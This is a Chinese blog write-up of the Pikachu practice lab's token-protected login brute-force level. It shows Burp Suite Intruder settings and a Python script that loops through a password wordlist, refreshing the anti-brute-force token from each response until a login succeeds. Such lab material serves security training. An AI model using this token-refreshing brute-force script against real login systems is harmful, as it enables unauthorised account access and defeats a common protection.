pikachu 返回值 token防爆破-burpsuite

已于 2023-03-22 09:53:29 修改
阅读量1.2k 收藏 11
点赞数 3
分类专栏: burpsuite 文章标签: burpsuit
于 2022-11-30 10:12:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/128109251
版权 
知识点:利用 burpsuite 循环把返回的 token 值加到登录的 token 上。

burpsuite 实现步骤

先抓包,然后发到 repeater 里发个包

在这里插入图片描述
之后再由 repeater 转发到 intruder ,选中要爆破和替换的值,并把 attack type 模式调成 pitchfork
在这里插入图片描述
然后选择 1 的位置,也就是密码,载入要爆破的字典。
在这里插入图片描述
参数二,也就是 token 有两个要设置的地方,第一个就是要从返回的数据中选中 token
在这里插入图片描述
选中 token 并点击 ok
在这里插入图片描述
第二个地方就是重定向的模式。

在这里插入图片描述
最重要的一步就是要把线程数设置为一。

在这里插入图片描述
最后就是设置 token 参数的爆破模式了。
在这里插入图片描述

最后攻击后可以明显看到一个返回值长度不一样的数据,密码是 123456
在这里插入图片描述

python 脚本实现步骤

import requests
from lxml import etree
url = 'http://64dff89e-c426-4cdc-8b0d-2064b2b5c2b4.node4.buuoj.cn:81/vul/burteforce/bf_token.php'

token_xpath = "//div[@class='bf_form_main']/form[@id='bf_client']/input/@value"

s = requests.session()

req = s.get(url)
req.encoding = 'utf-8'
html = etree.HTML(req.text)
token = html.xpath(token_xpath)
token = ''.join(token)

with open('../字典/passwd.txt','r') as f:
    password = f.readline()[:-1]
    while True:
        if(password == ''):
            break
        else:
            password = f.readline()[:-1]
        data = {
            'username':'admin',
            'password':password,
            'token':token,
            'submit':'login'
        }
        req_two = s.post(url,data=data)
        if 'login success' in req_two.text:
            print('[+]: ' + password)
            break
        else:
            req_two.encoding = 'utf-8'
            html = etree.HTML(req_two.text)
            token = html.xpath(token_xpath)
            token = ''.join(token)
succ3
关注
  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu靶场第四关-密码爆破token爆破 (附代码审计)
m0_60635321的博客
04-08 587
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
pikachu靶场练习——暴力破解
qq_42176496的博客
08-18 1122
pikachu暴力破解详解
pikachu靶场: 暴力破解第四关(token爆破)
X_shiguang的博客
01-25 662
Token是服务端生成的一串字符串,以作客户端进行请求的一个令牌,当第一次登录后,服务器生成一个 Token 同时将此 Token 返回给客户端。此外,Token 是有时效的,一段时间之后或下一次请求时用户需要重新验证。
pikachu靶场第四关-密码爆破token爆破?(附代码审计)
最新发布
yzasts的博客
03-17 431
就和前两关的验证码是一样的,第二关验证码的漏洞在于,如果默认验证码的值没有变化,那么就可以一直使用该验证码进行爆破,而第三关验证码的漏洞在于,它只做了前端验证,没有后端验证,将前端js禁用后,不论你的验证码输入了什么,都不会在后端进行验证的。另外一些敏感数据,例如用户的ID、会话ID等,不需要被用户看到,但又需要在表单提交时一起提交,这时候也可以使用type=hidden。它会在后端代码每校验一次后,便重置token的值,导致原来的token值失效,从而阻止爆破的发生。让我们看看网页的源代码。
pikachu靶场--暴力破解--验证码绕过以及token爆破知识点【1.2】~【1.4】
lmei1228的博客
05-31 657
如果我们想要爆破的话,在每次请求前要把上一次请求的响应包获取到,把其中的token值取出来,token采用递归payload,把上次请求的token值作为本次请求的token值,然后再进行发送,进入options选项,从响应中提取选项,fetch response,在响应包中选中token值,然后提交token,即可运行。暴力破解--验证码绕过 on client:正确的应该是,后端生成验证码,传到前端时是图片的形式,(而不是以字符串的形式)用户在前端输入验证码,与后端的验证码值做对比。
pickachu暴力破解3(token爆破?)
qq_62536279的博客
11-06 398
token爆破
pikachu-master.zip
06-25
"Pikachu-master.zip"这个压缩包文件,无疑为我们提供了一个宝贵的网络安全学习资源——Pikachu靶场。靶场,是网络安全领域中的一个重要概念,它模拟真实网络环境,让学习者在可控的环境中实践和测试各种安全攻...
draw-pikachu-on-the-web
03-20
在“draw-pikachu-on-the-web”项目中,我们主要关注的是如何利用JavaScript技术在Web浏览器上绘制宝可梦皮卡丘。JavaScript是一种广泛用于网页交互的编程语言,它允许开发者实现动态效果、用户交互以及复杂的图形...
Detective Pikachu Wallpapers and New Tab-crx插件
03-15
通过安装此Detective Pikachu扩展程序,忘掉无聊的新标签页,并使其变得更加有趣。 您将获得各种质量上乘的墙纸,这些精美的电影将带入您的浏览器。 此外,您将能够一直享受这些背景,因为它们会在您浏览时出现。 ...
pikachu-volleyball-p2p-online:通过WebRTC数据通道在线进行Pikachu排球对等
02-04
皮卡丘排球P2P在线✓英语| 皮卡丘排球(対戦ぴかちゅ〜ビ ー チ バ レ ー编)是由“(C)SACHI SOFT / SAWAYAKAN Programmers”和“(C)Satoshi Takenouchi”在1997年开发的一种旧版Windows游戏。...
JC-AntiToken:burp插件:python版,token重放绕过
05-27
JC-AntiToken burp插件:python版,token重放绕过 Author: JC0o0l,Jerrybird Team: Z1-Sec WeChat: JC_SecNotes(Zer0ne安全研究) 0x01 目标: token重放绕过 界面效果如下: 0x02 适用场景: 请求包带有重放的tokentoken需要去请求另一个接口才能得到 0x03 使用: 0x0301 下载安装: 从GitHub下载该项目: Burp中配置python环境jython-2.7.jar 加载JC-AntiToken.py插件 0x0302 配置: (一)、左侧设置token在响应中位置: URL:填写token接口的URL,如: 注:不要填写?及之后的参数 ReqMeth: 选择请求头方法 ConType: 选择Content-Type CharSet: 选择编码方式 Header
Detective Pikachu Wallpaper New Tab Theme-crx插件
04-07
在每个新标签上,只有新电影《皮卡丘侦探》中的最佳图像。 安装此扩展程序,以在每个新选项卡上获得皮卡丘侦探的高清图像! 我们始终会更新图像,因此请继续签入...通过我们的扩展,您可以获得:1:高分辨率的新标签...
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu-master
05-04
将下载的pikachu-master压缩包解压到指定目录,如`/opt`: ``` sudo tar -zxvf pikachu-master.tar.gz -C /opt ``` 进入解压后的目录: ``` cd /opt/pikachu-master ``` 5. 配置Pikachu 使用文本编辑器...
Pikachu Wallpaper - New Tab Theme-crx插件
04-06
皮卡丘 - 新标签主题安装并获得与Pikachu壁纸扩展的更好的镀Chrome,由粉丝制作,为粉丝们享受动漫,每次打开新标签时都会享受Pikachu的各种各样的HD壁纸..您好动漫粉丝欢迎来到我们的页面,皮卡丘新标签和壁纸插件...
pikachu暴力破解练习
qq_38255759的博客
05-11 342
大概流程:因为没有验证码,直接输入账户密码就可以登录,所以不断地使用不同的账户或密码尝试登录就可以破解,直接用burp抓包,在数据包把user,passwd设置为变量,跑字典就可以测试出来账户密码;
Pikachu登录爆破token爆破解析
黄乔国PHP
03-30 878
其实不然,有token我们依然可以爆破,关键核心点是我们在每次爆破前将token的值获取到,然后就能爆破啦!和狙击手差不多,一个参数的话都一样,只不过如果添加了两个参数的话,就一起进行爆破。那么两个参数爆破时候的值肯定就是一样的了。如果添加了两个参数的话,就会挨着来,第一个参数开始爆破时,第二个不变,如此这样,会进行500+500此 总共1000次爆破。顾名思义,就是一个一个的来,就跟98K一样,一ju一个准。添加了一个参数的话,并且假设payload有500个的话,那就执行500次,
token的登陆页面爆破方法(burp宏+爬虫脚本分享)
seek_2022的博客
12-18 3832
本文以DVWA登陆页面为例介绍并演示了含token的登陆页面如何使用burp宏或爬虫脚本实时更新token并进行爆破操作,其中爬虫是我个人重点推荐的,操作简单效率极高,burp相对会繁琐一些。
pikachu靶场token爆破
10-17
具体来说,pikachu靶场的token机制是这样的:每个用户登录后,系统会为其生成一个token,该token会在用户进行操作时被验证。如果用户在一定时间内没有进行任何操作,该token会失效。这样可以有效地止暴力破解攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值